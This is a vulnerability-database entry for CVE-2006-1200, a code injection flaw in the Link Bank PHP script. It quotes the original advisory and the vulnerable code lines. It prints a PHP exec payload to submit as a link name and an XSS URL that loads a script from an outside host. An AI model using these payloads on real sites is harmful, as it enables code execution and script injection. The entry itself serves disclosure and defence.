Link Bank ‘add_link.txt’直接静态代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195752 漏洞类型 输入验证
发布时间 2006-03-13 更新时间 2006-03-14
CVE编号 CVE-2006-1200 CNNVD-ID CNNVD-200603-232
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006030050
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-232
|漏洞详情
在daveraveLinkBank的add_link.txt中存在直接静态代码注入漏洞,远程攻击者可通过以下途径执行任意PHP代码:在存储到links.txt中之前,未经清洁的url_name参数,以后会用在包含叙述中。
|漏洞EXP
??? summary
	software: Link Bank
	vendors website: http://daverave.64digits.com/index.php?page=linkbank
	versions: n/a
	class: remote
	status: unpatched
	exploit: available
	solution: not available
	discovered by: retard
	risk level: high

??? description
	Link Bank does not sanatise post sumbited to it allowing users to
	insert data that can be used malisiously. after it is submited the 
	data goes to a .txt file witch the application reads and executes
	to display the links submited. along with this it is vulnerable
	to xss due to the application not sanatising the variable again.
	
	in ./content/index.txt:
14	<?php
15	include("links.txt");
16	?>
	
	in ./content/add_link.txt:
2	$url_name = $_REQUEST['url_name'];
3	$url = $_REQUEST['url'];
4	$img = $_REQUEST['img'];
5	$filename = "content/links.txt";
6	$code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>";

in ./iframe.php:
3	<title>Link Bank - <?php echo"$site";?></title>

??? exploit(s)
	code execution:
	submit something like <?php exec($cmd) ?> as a link name

xss:
	http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20sr
c=http://notlegal.ws/xss.js%3E%3C/script%3E

??? credit
	author(s): retard
	email: retard (at) 30gigs (dot) com [email concealed]
|参考资料

来源:BUGTRAQ
名称:20060306linkbankcodeexecutionandxss
链接:http://www.securityfocus.com/archive/1/archive/1/426932/100/0/threaded
来源:VUPEN
名称:ADV-2006-0885
链接:http://www.frsirt.com/english/advisories/2006/0885
来源:SECUNIA
名称:19154
链接:http://secunia.com/advisories/19154
来源:BID
名称:17004
链接:http://www.securityfocus.com/bid/17004
来源:OSVDB
名称:23750
链接:http://www.osvdb.org/23750
来源:SREASON
名称:553
链接:http://securityreason.com/securityalert/553